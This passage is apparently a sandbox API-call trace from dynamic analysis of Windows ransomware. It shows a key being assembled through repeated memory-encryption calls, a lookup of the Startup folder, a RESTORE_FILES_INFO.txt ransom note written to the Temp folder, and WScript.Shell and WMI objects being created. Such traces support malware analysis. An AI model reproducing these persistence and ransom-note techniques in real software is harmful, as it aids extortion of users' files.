Memory=0x70e734) returned 0x0 [0081.378] SysStringLen (param_1="T3m#CEr&") returned 0x8 [0081.378] SystemFunction040 (in: Memory=0x70e734, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x70e734) returned 0x0 [0081.379] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ") returned 0x8 [0081.477] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ") returned 0x8 [0081.477] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ") returned 0x8 [0081.477] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ00050654") returned 0x10 [0081.477] SystemFunction041 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.477] SysStringLen (param_1="T3m#CEr&r媫莗꩘휂Ꞷ熾輶") returned 0x10 [0081.477] SystemFunction040 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.477] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ萲맆颸鸳릉ᓀ") returned 0x10 [0081.477] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ萲맆颸鸳릉ᓀ") returned 0x10 [0081.477] SystemFunction041 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.477] SysStringLen (param_1="T3m#CEr&ru莗꩘휂Ꞷ熾輶") returned 0x10 [0081.477] SystemFunction040 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.477] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ횆暥㉔鿘趉?纹") returned 0x10 [0081.478] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ횆暥㉔鿘趉?纹") returned 0x10 [0081.478] SystemFunction041 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.478] SysStringLen (param_1="T3m#CEr&ruT꩘휂Ꞷ熾輶") returned 0x10 [0081.478] SystemFunction040 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.478] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓሞﬔܳ婍삽욑푁") returned 0x10 [0081.478] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓሞﬔܳ婍삽욑푁") returned 0x10 [0081.478] SystemFunction041 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.478] SysStringLen (param_1="T3m#CEr&ruTm휂Ꞷ熾輶") returned 0x10 [0081.478] SystemFunction040 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.478] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ嵿栉࿄ꛝ⌁ﻨᔽ䬆") returned 0x10 [0081.478] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ嵿栉࿄ꛝ⌁ﻨᔽ䬆") returned 0x10 [0081.478] SystemFunction041 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.478] SysStringLen (param_1="T3m#CEr&ruTmvꞶ熾輶") returned 0x10 [0081.478] SystemFunction040 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.478] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ̘㛣뢋ᖆ狲﯑귈쁷") returned 0x10 [0081.478] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ̘㛣뢋ᖆ狲﯑귈쁷") returned 0x10 [0081.478] SystemFunction041 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.478] SysStringLen (param_1="T3m#CEr&ruTmvN熾輶") returned 0x10 [0081.479] SystemFunction040 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.479] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓಿ뇋䘞ֵ쀂⿍괒") returned 0x10 [0081.479] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓಿ뇋䘞ֵ쀂⿍괒") returned 0x10 [0081.479] SystemFunction041 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.479] SysStringLen (param_1="T3m#CEr&ruTmvN&輶") returned 0x10 [0081.479] SystemFunction040 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.479] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ繢?綂ᛛ㤗۝攈") returned 0x10 [0081.479] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓ繢?綂ᛛ㤗۝攈") returned 0x10 [0081.479] SystemFunction041 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.479] SysStringLen (param_1="T3m#CEr&ruTmvN&4") returned 0x10 [0081.479] SystemFunction040 (in: Memory=0x6e750c, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x6e750c) returned 0x0 [0081.479] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧") returned 0x10 [0081.479] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧") returned 0x10 [0081.479] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧") returned 0x10 [0081.479] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧ecture") returned 0x18 [0081.479] SystemFunction041 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.479] SysStringLen (param_1="T3m#CEr&ruTmvN&43펶툕璿ၯ㴪館㰗") returned 0x18 [0081.479] SystemFunction040 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.480] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧⛯炮Wꁝ腫༚鵺") returned 0x18 [0081.480] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧⛯炮Wꁝ腫༚鵺") returned 0x18 [0081.480] SystemFunction041 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.480] SysStringLen (param_1="T3m#CEr&ruTmvN&43X툕璿ၯ㴪館㰗") returned 0x18 [0081.480] SystemFunction040 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.480] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧꟩܉ꍓ酫雓㔺") returned 0x18 [0081.480] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧꟩܉ꍓ酫雓㔺") returned 0x18 [0081.480] SystemFunction041 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.480] SysStringLen (param_1="T3m#CEr&ruTmvN&43XG璿ၯ㴪館㰗") returned 0x18 [0081.480] SystemFunction040 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.480] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧イ껀㈚㋭?旫包") returned 0x18 [0081.480] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧イ껀㈚㋭?旫包") returned 0x18 [0081.480] SystemFunction041 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.480] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqၯ㴪館㰗") returned 0x18 [0081.480] SystemFunction040 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.480] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧ᗙ箼柷꓈꙲卬뵸") returned 0x18 [0081.480] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧ᗙ箼柷꓈꙲卬뵸") returned 0x18 [0081.480] SystemFunction041 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.481] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQ㴪館㰗") returned 0x18 [0081.481] SystemFunction040 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.481] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧좋䙗⛯莰᜞埼") returned 0x18 [0081.481] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧좋䙗⛯莰᜞埼") returned 0x18 [0081.481] SystemFunction041 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.481] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQR館㰗") returned 0x18 [0081.481] SystemFunction040 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.481] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧叞酟㽹ʡ筕춀頻ঐ") returned 0x18 [0081.481] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧叞酟㽹ʡ筕춀頻ঐ") returned 0x18 [0081.481] SystemFunction041 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.481] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC㰗") returned 0x18 [0081.481] SystemFunction040 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.481] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧ʡ幔핬藀̦?") returned 0x18 [0081.481] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧ʡ幔핬藀̦?") returned 0x18 [0081.481] SystemFunction041 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.482] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}") returned 0x18 [0081.482] SystemFunction040 (in: Memory=0x6f9524, MemorySize=0x30, OptionFlags=0x0 | out: Memory=0x6f9524) returned 0x0 [0081.482] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁") returned 0x18 [0081.482] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁") returned 0x18 [0081.482] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁") returned 0x18 [0081.482] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁id=\"C:\"") returned 0x20 [0081.482] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.482] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R땠耑뤵燼ი") returned 0x20 [0081.482] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.482] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁碯⥨麣⿩픆䴿ꄅ丐") returned 0x20 [0081.482] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁碯⥨麣⿩픆䴿ꄅ丐") returned 0x20 [0081.482] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.482] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0땠耑뤵燼ი") returned 0x20 [0081.482] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.483] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁⏢ݞ⽯侼쭎띻䧓侟") returned 0x20 [0081.483] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁⏢ݞ⽯侼쭎띻䧓侟") returned 0x20 [0081.483] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.483] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0v耑뤵燼ი") returned 0x20 [0081.483] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.483] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁볮痯믥巯ݹᦅ⸝") returned 0x20 [0081.483] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁볮痯믥巯ݹᦅ⸝") returned 0x20 [0081.483] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.483] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU耑뤵燼ი") returned 0x20 [0081.483] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.483] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁蠲ⓗ黰얊섬嵔좰鳣") returned 0x20 [0081.483] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁蠲ⓗ黰얊섬嵔좰鳣") returned 0x20 [0081.483] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.483] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{뤵燼ი") returned 0x20 [0081.483] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.484] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁㶥薳鉄鸋뵣꫺Ḍ") returned 0x20 [0081.484] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁㶥薳鉄鸋뵣꫺Ḍ") returned 0x20 [0081.484] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.484] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[燼ი") returned 0x20 [0081.484] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.484] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁˩੘㳂鉸쩊鼎") returned 0x20 [0081.484] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁˩੘㳂鉸쩊鼎") returned 0x20 [0081.484] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.487] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[3ი") returned 0x20 [0081.487] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.488] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁깠仼桌媯죽븷㣔寅") returned 0x20 [0081.488] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁깠仼桌媯죽븷㣔寅") returned 0x20 [0081.488] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.488] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[3B") returned 0x20 [0081.488] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.618] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁鳁擑蚺嬁^鱤岨") returned 0x20 [0081.618] SystemFunction041 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.618] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[3B") returned 0x20 [0081.618] SystemFunction040 (in: Memory=0x6f0ab4, MemorySize=0x40, OptionFlags=0x0 | out: Memory=0x6f0ab4) returned 0x0 [0081.618] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[3B") returned 0x20 [0081.618] SysStringLen (param_1="T3m#CEr&ruTmvN&43XGqQRC}R0vU{[3B") returned 0x20 [0082.742] CoTaskMemAlloc (cb=0x20c) returned 0x728ab0 [0082.742] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x728ab0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0082.742] CoTaskMemFree (pv=0x728ab0) [0082.742] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpFilePart=0x0) returned 0x5b [0082.759] CoTaskMemAlloc (cb=0x20c) returned 0x728ab0 [0082.759] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x728ab0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0082.759] CoTaskMemFree (pv=0x728ab0) [0082.759] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x26e4c0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e [0082.760] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x26e4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x31 [0082.760] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x47 [0082.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e928) returned 1 [0082.761] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\restore_files_info.txt"), fInfoLevelId=0x0, lpFileInformation=0x26e9a4 | out: lpFileInformation=0x26e9a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0082.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e924) returned 1 [0082.764] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e398, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x47 [0082.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e88c) returned 1 [0082.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RESTORE_FILES_INFO.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\restore_files_info.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x354 [0082.765] GetFileType (hFile=0x354) returned 0x1 [0082.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e888) returned 1 [0082.765] GetFileType (hFile=0x354) returned 0x1 [0082.767] WriteFile (in: hFile=0x354, lpBuffer=0x24c198c*, nNumberOfBytesToWrite=0x5ee, lpNumberOfBytesWritten=0x26e934, lpOverlapped=0x0 | out: lpBuffer=0x24c198c*, lpNumberOfBytesWritten=0x26e934*=0x5ee, lpOverlapped=0x0) returned 1 [0082.768] CloseHandle (hObject=0x354) returned 1 [0082.793] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x26d17c | out: lpclsid=0x26d17c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0083.697] CoGetClassObject (in: rclsid=0x700d34*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cda8 | out: ppv=0x26cda8*=0x6f995c) returned 0x0 [0087.177] WshShell:IUnknown:QueryInterface (in: This=0x6f995c, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26cfc0 | out: ppvObject=0x26cfc0*=0x0) returned 0x80004002 [0088.093] WshShell:IClassFactory:CreateInstance (in: This=0x6f995c, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cfd4 | out: ppvObject=0x26cfd4*=0x73fddc) returned 0x0 [0088.280] WshShell:IUnknown:Release (This=0x6f995c) returned 0x0 [0091.004] WbemLocator:IUnknown:QueryInterface (in: This=0x73fddc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cbfc | out: ppvObject=0x26cbfc*=0x73fddc) returned 0x0 [0091.005] WbemLocator:IUnknown:QueryInterface (in: This=0x73fddc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26cbb8 | out: ppvObject=0x26cbb8*=0x0) returned 0x80004002 [0091.216] WbemLocator:IUnknown:QueryInterface (in: This=0x73fddc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26c9d4 | out: ppvObject=0x26c9d4*=0x6f99a4) returned 0x0 [0092.550] WbemLocator:IProvideClassInfo:GetClassInfo (in: This=0x6f99a4, ppTI=0x26c9dc | out: ppTI=0x26c9dc*=0x76476c) returned 0x0 [0093.126] ITypeInfo:RemoteGetTypeAttr (in: This=0x76476c, ppTypeAttr=0x26c9d0, pDummy=0xf8cde5a1 | out: ppTypeAttr=0x26c9d0, pDummy=0xf8cde5a1) returned 0x0 [0094.826] ITypeInfo:LocalReleaseTypeAttr (This=0x76476c) returned 0xc50001 [0094.827] WbemLocator:IUnknown:Release (This=0x6f99a4) returned 0x2 [0094.827] WbemLocator:IUnknown:Release (This=0x76476c) returned 0x0 [0095.555] WbemLocator:IUnknown:AddRef (This=0x73fddc) returned 0x3 [0095.555] WbemLocator:IUnknown:QueryInterface (in: This=0x73fddc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c514 | out: ppvObject=0x26c514*=0x0) returned 0x80004002 [0095.729] WbemLocator:IUnknown:QueryInterface (in: This=0x73fddc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c4c4 | out: ppvObject=0x26c4c4*=0x0) returned 0x80004002 [0095.912] WbemLocator:IUnknown:QueryInterface (in: This=0x73fddc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c4d0 | out: ppvObject=0x26c4d0*=0x73fd3c) returned 0x0 [0095.912] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x73fd3c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26c4d8 | out: pCid=0x26c4d8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0095.912] WbemLocator:IUnknown:Release (This=0x73fd3c) returned 0x3 [0095.912] CoGetContextToken (in: pToken=0x26c530 | out: pToken=0x26c530) returned 0x0 [0095.912] CoGetObjectContext (in: riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7344e4 | out: ppv=0x7344e4*=0x6ded28) returned 0x0 [0095.913] CoGetContextToken (in: pToken=0x26c938 | out: pToken=0x26c938) returned 0x0 [0095.913] WbemLocator:IUnknown:QueryInterface (in: This=0x73fddc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c9c8 | out: 